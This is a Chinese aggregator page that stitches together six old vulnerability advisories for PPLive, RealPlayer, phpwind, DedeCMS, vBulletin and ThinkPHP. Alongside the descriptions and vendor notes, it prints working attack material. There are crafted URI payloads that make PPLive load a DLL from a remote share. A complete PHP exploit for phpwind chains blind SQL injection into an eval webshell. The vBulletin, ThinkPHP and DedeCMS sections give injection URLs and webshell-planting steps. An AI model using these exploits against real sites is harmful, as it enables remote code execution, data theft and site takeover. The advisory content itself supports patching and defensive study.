PPLive URI处理器LoadModule参数多个代码执行漏洞
“走一段路”通过精心收集,向本站投稿了6篇PPLive URI处理器LoadModule参数多个代码执行漏洞,下面是小编给大家带来PPLive URI处理器LoadModule参数多个代码执行漏洞,一起来阅读吧,希望对您有所帮助。
篇1:PPLive URI处理器LoadModule参数多个代码执行漏洞
影响版本:
聚力传媒 PPLive <= 1.9.21
漏洞描述:
BUGTRAQ ID: 34128PPLive是非常流行的P2P网络视频客户端,PPLive的synacast://、Play://、pplsv://和ppvod:// URI处理器在评估命令行参数时没有正确地验证URI参数,如果用户受骗跟随的链接中包含有特制的/LoadModule参数的话,就可能导致Internet Explorer加载远程VNC路径所指定的dll。厂商补丁:
聚力传媒
--------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
www.pplive.com/
测试方法:
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
synacast://www.example.com/?\“%20/LoadModule%20\\example.com\\unc_share\\sh.dll%20\”Play://www.example.com/?\“%20/LoadModule%20\\\\example.com\\unc_share\\sh.dll%20\”pplsv://www.example.com/?\“%20/LoadModule%20\\\\example.com\\unc_share\\sh.dll%20\”ppvod://www.example.com/?\“%20/LoadModule%20\\\\example.com\\unc_share\\sh.dll%20\”
看昨天的:/Article/03/36644.html
篇2:RealPlayer IVR文件解析多个代码执行漏洞
RealPlayer11的IVR文件处理例程中存在多个安全漏洞,如果攻击者更改了IVR文件中用于确定结构长度的字段的话,就可以触发堆溢出;如果在IVR文件中设置了超长的文件名长度值的话,就会向任意内存地址写入一个空字节。
受影响系统:
Real Networks RealPlayer 11
描述:
BUGTRAQ ID: 33652
CVE(CAN) ID: CVE-2009-0375,CVE-2009-0376
RealPlayer是一款流行的多媒体播放器,
RealPlayer11的IVR文件处理例程中存在多个安全漏洞。如果攻击者更改了IVR文件中用于确定结构长度的字段的话,就可以触发堆溢出;如果在IVR文件中设置了超长的文件名长度值的话,就会向任意内存地址写入一个空字节。
该漏洞存在于一个可用作Windows资源管理器shell插件的DLL上,因此不需要用户打开恶意媒体文件就可以触发上述漏洞。只要用户通过资源管理器预览了IVR文件,就可能导致执行任意代码。
厂商补丁:
目前Real Networks还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
www.real.com
篇3:phpwind多个远程代码执行漏洞(phpwind sql injection vulnerability)漏洞预警
影响系统
phpwind 7
phpwind 8
详细描述
phpwind 7和8版本存在输入验证漏洞,攻击者成功利用该漏洞可以远程执行任意php代码,
问题存在于pw_ajax.php中,由于用户提交给fieldname参数的数据缺少充分的过滤,攻击者可利用漏洞进行SQL注入攻击获取任何数据库里的数据。
另外class_other.php中存在一个任意命令执行的漏洞,由于对$class[cid]输入缺少充分过滤,不过进入此逻辑需要一些较为关键的key,借助上面的注射漏洞即可获得该key。
PHPWind has a sql injection vulnerability, which can be exploited by malicious people to conduct SQL injection attacks.
Input passed to the “fieldname” Parameter in pw_ajax.php is not properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
In addition Input passed to the “$class[cid]” Parameter in class_other.php is not properly sanitised before being used in a SQL query. But in order to reach this logic code need some important key, attacker could exploit above sql injection vulnerability to get key .
测试代码
echo ”
Info: Poc for Phpwind远程命令执行
Test: exploit.php user passwordwww.blackxl.org/phpwind/
“;
if($argc<3){
echo “\r\n参数缺少\r\n”;
die;
}
$user=$argv[1];
$pass=$argv[2];
$pwurl=$argv[3];
$myheader=array(
‘Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8′,
‘Accept-Language: zh-cn,zh;q=0.5′,
‘Accept-Charset: gb2312,utf-8;q=0.7,*;q=0.7′,
‘Content-Type: application/x-www-form-urlencoded; charset=UTF-8′,
‘Referer:www.blackxl.org‘,
‘Connection: Keep-Alive’,
‘Cache-Control: no-cache’,
‘User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; InfoPath.2)’
);
$cookie=”“;
$str=curlsend(“$pwurl/login.php?”,”POST”,0,$myheader,”forward=&jumpurl=http%3A%2F%2F127.0.0.1%2FPHPWind/upload%2F&step=2&lgt=0&pwuser=$user&pwpwd=$pass&hideid=0&cktime=31536000&submit=%B5%C7%C2%BC”,1);
preg_match_all(“/Set-Cookie:([^;]+)/is”,$str,$array);
for($i=0;$i
$cookie=$cookie.”;”.$array[1][$i];
}
//echo $cookie;
$test = curlsend(‘$pwurl/pw_ajax.php’,”POST”,0,$myheader,”,1);
if(strpos($test,’’)) {
die(‘用户密码或者其他参数错误’);
}
$shellcode=”action=pcdelimg&fieldname=db_value%20from%20pw_config%20where%20db_name%20like%200x64625f736974656f776e65726964%20and%20db_value%20like%200x{offset}25%20union%20select%200x612e2e;%23″;
$hash=”0123456789abcdef”;
$craked=””;
for($i=0;$i<32;$i++){
for($n=0;$n<16;$n++){
$tmp=str_replace(“{offset}”,bin2hex($craked.$hash[$n]),$shellcode);
$tmp=curlsend(“$pwurl/pw_ajax.php”,”POST”,0,$myheader,$tmp,0);
if(strpos($tmp,”pw_config”)){
echo “CrackEd Offset “.($i+1).” :”.$hash[$n].”\r\n”;
$craked=$craked.$hash[$n];
break;
}
}
}
echo “Craked Magicdata :”.$craked.”\r\n”;
echo “Get shell :”;
//another 0day
$arg=”;
$hack = array();
$hack['mode'] = ‘Other’;
$hack['method'] = ‘threadscateGory’;
$hack['params'] = ‘a:1:{s:3:”cid”;a:1:{s:3:”cid”;a:1:{s:3:”cid”;s:21:”\’.eval($_GET[c]).\’abc”;}}}’;
$hack['type'] = ‘app’;
$hack = strips($hack);
ksort($hack);
reset($hack);
foreach ($hack as $key =>$value) {
if ($value && $key != ‘sig’) {
$arg .= “$key=$value&”;
}
}
$arg.=’sig=’.md5($arg.$craked);
echo file_get_contents(“$pwurl/pw_api.php?”.$arg);
echo “OK\r\n”;
$str=file_get_contents(“$pwurl/data/bbscache/info_class.php?c=echo%20Just_wooyun;”);
if(strpos($str,’wooyun’)){
echo “Got shell :”.”$pwurl/data/bbscache/info_class.php?c=phpinfo();”;
echo “\r\nOver!”;
}
function strips($param) {
if (is_array($param)) {
foreach ($param as $key =>$value) {
$param[$key] = strips($value);
}
} else {
$param = stripslashes($param);
}
return $param;
}
function curlsend($url,$method=false,$ssl=0,$myheader,$data=”,$header=0){
global $cookie;
$ch = curl_init();
$timeout = 0; // set to zero for no timeout
curl_setopt ($ch, CURLOPT_URL, $url);
curl_setopt ($ch, CURLOPT_POST, $method);
curl_setopt($ch,CURLOPT_HTTPHEADER,$myheader);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
curl_setopt ($ch, CURLOPT_COOKIE, $cookie);
if($data){
curl_setopt ($ch, CURLOPT_POSTFIELDS,$data);
}
curl_setopt ($ch, CURLOPT_HEADER, $header);
if($ssl){
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
}
$handles = curl_exec($ch);
curl_close($ch);
//echo $handles;
return $handles;
}
解决方案
目前没有详细解决方案提供:
www.phpwind.net
篇4:织梦网任意代码执行漏洞
www.xssor.cn/sa
用dedecms 朋友还是小心点吧,
漏洞页面是 \include\inc_bookfunctions.php
触发页面是 member/story_add_content_action.php
接着就是打开下面的地址:
www.guo3.com/member/story_add_content_action.php?chapterid=1&arcID=1&body=?>后面加上一句话代码,
当你看到成功的提示就表示成功了。
然后打开www.guo3.com/data/textdata/1/bk1.php就是我们
篇5:vbulletin 3.0.x PHP代码执行漏洞
Vulnerable Systems:
----------------
vBulletin version 3.0 up to and including version 3.0.4
Immune systems:
----------------
vBulletin version 3.0.5
vBulletin version 3.0.6
Vulnerable code in forumdisplay.php :
#############################################################
if ($vboptions['showforumusers'])
{
.
.
.
.
if ($bbuserinfo['userid'])
{
.
.
.
.
$comma = ', ';
}
.
.
.
.
while ($loggedin = $DB_site->fetch_array($forumusers))
{
.
.
.
eval('$activeusers .= “' . $comma . fetch_template('forumdisplay_loggedinuser')
. '”;'); <<==== (Vuln)
$comma = ', ';
.
.
}
.
.
}
#############################################################
Conditions:
----------------
1st condition : $vboptions['showforumusers'] == True , the admin must set
showforumusers ON in vbulletin options.
2nd condition : $bbuserinfo['userid'] == 0 , you must be an visitor/guest
.
3rd condition : $DB_site->fetch_array($forumusers) == True , when you
visit the forums, it must has at least one user show the forum.
4th condition : magic_quotes_gpc must be OFF
SPECIAL condition : you must bypass unset($GLOBALS[“$_arrykey”]) code in
init.php by secret array GLOBALS[]=1 ;)))
Solutions:
----------------
* Disable showforumusers in vbulletin options .
* add the next line before if ($vboptions['showforumusers'])
$comma = '';
Exploit:
----------------
example :
site/forumdisplay.php?GLOBALS[]=1&f=2&comma=“.system('id').”
篇6:ThinkPHP framework 任意代码执行漏洞预警漏洞预警
ThinkPHP是一个国内使用很广泛的老牌PHP MVC框架,貌似国内有不少创业公司或者项目都用了这个框架。
最近官方发布了一个安全补丁,官方表述是:该URL安全漏洞会造成用户在客户端伪造URL,执行非法代码。
可是貌似大多数开发者和使用者并没有注意到此漏洞的危害性,应者了了,更不用说有多少人去升级了。随后我对其进行了分析,发现此问题果然是一个非常严重的问题,只要使用了thinkphp框架,就可以直接执行任意php代码。特此发帖预警各位。
我们来分析一下官方的补丁:
/trunk/ThinkPHP/Lib/Core/Dispatcher.class.php
125 - $res = preg_replace('@(w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']=“\\2”;', implode($depr,$paths));
125 + $res = preg_replace('@(w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']=\'\\2\';', implode($depr,$paths));
这个代码是把pathinfo当作restful类型url进行解析的,主要作用是把pathinfo中的数据解析并合并到$_GET数组中,
然而在用正则解析pathinfo的时候,主要是这一句:
$res = preg_replace('@(w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']=“\\2”;', implode($depr,$paths));
这里明显使用了preg_replace的/e参数,这是个非常危险的参数,如果用了这个参数,preg_replace第二个参数就会被当做php代码执行,作者用这种方式在第二个参数中,利用PHP代码给数组动态赋值。
'$var[\'\\1\']=“\\2”;'
而这里又是双引号,而双引号中的php变量语法又是能够被解析执行的。因此,攻击者只要对任意一个使用thinkphp框架编写的应用程序,使用如下方式进行访问,即可执行任意PHP代码:
index.php/module/action/param1/${@print(THINK_VERSION)}
由于是双引号执行,这里为了保险起见,不给出更有危害性的代码,利用这个还是需要点技巧的。
总之这个问题非常严重,找了一下,发现目前没有修补漏洞的网站还是很多的。而ThinkPHP框架的特征其实非常好识别,有意者直接写个scanner进行扫描也未必不可能。
为了不造成更大损失,特地发帖希望引起各位使用thinkphp做开发的同学关注。尽早升级官方的安全补丁
作者:GaRY
【PPLive URI处理器LoadModule参数多个代码执行漏洞】相关文章:
文档为doc格式